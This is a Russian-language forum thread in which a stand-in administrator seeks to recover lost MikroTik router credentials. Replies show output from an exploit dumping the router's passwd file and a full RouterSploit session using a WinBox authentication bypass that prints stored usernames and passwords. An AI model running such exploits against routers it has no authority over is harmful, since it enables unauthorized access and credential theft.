LINUX.ORG.RU
решено ФорумAdmin

Восстановление доступа к админке mikrotik

 , ,


2

2

Добрый день ребят. Кому-то удавалось восстановить/сбросить креды к Mikrotik RB2011UiAS-2HnD-IN, без ресета настроек? Физический доступ к роутеру есть, нужно просто допилить настройки нового провайдера, а админа, что поднимал сеть, давно нет.. ПО 6.41.3, ребят, буду прям ну очень благодарен за помощь



Последнее исправление: BleakBeast (всего исправлений: 1)

Ресетни и настрой по новой, раньше дыра была, но ее закрыли.

Deleted
()
Ответ на: комментарий от BleakBeast

Почему не хочешь ресетнуть? Если нужна непрерывность работы, то настрой другой девайс и временно держи сеть на нем, пока основной не перенастроишь.

Deleted
()
Ответ на: комментарий от Deleted

По факту я не админ, просто временно занял эту дыру, не могу похвастаться большим опытом с RouterOS, к нему подведено два провайдера (настроено автопереключение), разведено несколько роутеров, видеорегистратор с айпи-камерой.. Да и временного девайса, который всё затащит, под рукой нет. По твоим ощущениям - много на это времени понадобится? Не хотелось бы на ночь оставаться...

BleakBeast
() автор топика
Ответ на: комментарий от BleakBeast

Вспомнят что что-то ещё прокинуть надо, потом ещё, что-то по-другому настроить..
С минимальными знаниями можно и неделю провозиться.
Если предыдущий админ пропал бесследно, значит денюшкой обидели.

Deleted
()

если бекапы конфига сохранялись в файлы или на второй раздел - сброс в дефолт их не коснется. просто восстановишься с бэкапа или второго раздела (если он есть)

anonymous
()
Ответ на: комментарий от Deleted

6.42:

./1.py 
09
LM2����        �       �               �!unknown session id 80 bytes


6.41.3:
./1.py 
03
xvM2����        �       1Enobody:*:99:99:nobody:/tmp:/bin/sh
root::0:0:root:/home/root:/bin/sh
122 bytes



oooops!

Deleted
()
Ответ на: комментарий от anonymous

хотя не - по умолчанию файлы с бэкапом шифруются паролем админа. так что надежда только на бэкап-раздел флеша

anonymous
()
Ответ на: комментарий от Deleted

Первое что пришло в голову. Диапазон портов она видеть зачем-то не умеет, в принципе можно прописать диапазон прям руками в файл, страшно правда представить этот диапазон

BleakBeast
() автор топика
Ответ на: комментарий от BleakBeast

Сканируй все, роутер твой, никто по голове не настучит

Deleted
()
Ответ на: комментарий от BleakBeast

Извиняюсь, не так понял.
Вот что автор пишет:

Открытая вебморда обязательно, даже если порт 8291 открыт а веб-страница нет, эксплойт не работает

80й порт может быть доступен с определенного физического порта,например. так что имеет смысл потыкаться во все, если не поможет - сканировать на наличие открытых портов на всех портах роутера.

Deleted
()
Ответ на: комментарий от BleakBeast

У RouterSploit есть эксплойты к mikrotik https://github.com/threat9/routersploit/tree/master/routersploit/modules/expl... но мне сейчас не на чем их проверить тут гайд для новичков: https://hackware.ru/?p=1766

Если найдется незашифрованный бинарный бекап можно из него выцепить логин/пароль

Deleted
()
Последнее исправление: log4tmp (всего исправлений: 1)
Ответ на: комментарий от BleakBeast

Не помню, у меня с lcd в работе один девайс и тот в шкафу под потолком. Попробуй сам потыкать в меню Interfaces и посмотреть что там можно настроить.

Deleted
()
Последнее исправление: log4tmp (всего исправлений: 1)
Ответ на: комментарий от BleakBeast

Ну, если до этого настраивал только SOHO-маршрутизации, то трахаться будешь долго. Неделя, месяц... Как-то так.

ravdinve
()
Ответ на: комментарий от ravdinve

ТС не заблокировал, посмотрим что у него получится. А вообще согласен, толку от lcd никакого.

Deleted
()
Ответ на: комментарий от BleakBeast

Попробовал Routersploit:

rsf > use exploits/routers/mikrotik/winbox_auth_bypass_creds_disclosure
rsf (Mikrotik WinBox Auth Bypass - Creds Disclosure) > show options

Target options:

   Name       Current settings     Description                     
   ----       ----------------     -----------                     
   target                          Target IPv4 or IPv6 address     
   port       8291                 Target WinBox service           


Module options:

   Name          Current settings     Description                           
   ----          ----------------     -----------                           
   verbosity     true                 Enable verbose output: true/false     


rsf (Mikrotik WinBox Auth Bypass - Creds Disclosure) > set target 192.168.10.100
[+] target => 192.168.10.100

rsf (Mikrotik WinBox Auth Bypass - Creds Disclosure) > run
[*] Running module...
[*] Connection established
[+] Target seems to be vulnerable
[*] Dumping credentials

   Username     Password     
   --------     --------     
   test         Ghngt56s+        
   admin                     
   admin        test123        

на микроте(6.41.3) открыт только 8291

Deleted
()
Последнее исправление: log4tmp (всего исправлений: 1)
Ответ на: комментарий от Deleted

Благодаря таким людям, как ты и bdfy я всё еще верю в человечество) Подведя итог: winbox_auth_bypass_creds_disclosure из RouterSploit может вытащить креды микротика по 8291 (что понятно по названию), как минимум из 6.41.3 (это мне и нужно было). Router Scan by Stas'M может вытащить их из вебморды (80), тоже как минимум из 6.41.3. Большое спасибо bdfy за то что пытался помочь, огромная благодарность log4tmp за то что помог. С меня пиво, мужики) P.S. LCD практически бесполезен и абсолютно неудобен, и даже то что он может - проще с ноутбуком подойти и с него сделать...

BleakBeast
() автор топика
18 сентября 2018 г.
Ответ на: комментарий от BleakBeast

пытаюсь узнать пароль микротик v6.39.2 8291 закрыт, эксплоит не помог. 80 порт открыт однако толи я рукожоп толи еще что - Router Scan by Stas'M сканирует адрес показывает статус «done» и на этом все, поля логинов паролей пустые. Может я что то делаю не так?

anonymous
()
Ответ на: комментарий от anonymous

Судя по тому, что у тебя два устройства, возможно на одном из них 80 порт переброшен на второй, на котором прошивка без уязвимости т.к. более новая. Попробуй поискать веб уязвимого микротика на других портах, например 8008, 8080, 8090...

BleakBeast
() автор топика
Ответ на: комментарий от BleakBeast

да нет, оба микротика являются шлюзом разных филиалов связанные по l2tp.

т.е. нужный мне действительно с открытым 80м портом и «выше» него только оборудование провайдера.

anonymous
()
Ответ на: комментарий от anonymous

Выяснил. Для успешной эксплуатации уязвимости этим софтом, открыты должны быть и вебморда и винбокс, причем порт винбокса даже добавлять в сканлист не требуется, сервис просто должен быть включен. По сути роутерсплойт здесь справляется лучше. Так что если только веб, то скорее всего без вариантов.

BleakBeast
() автор топика
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.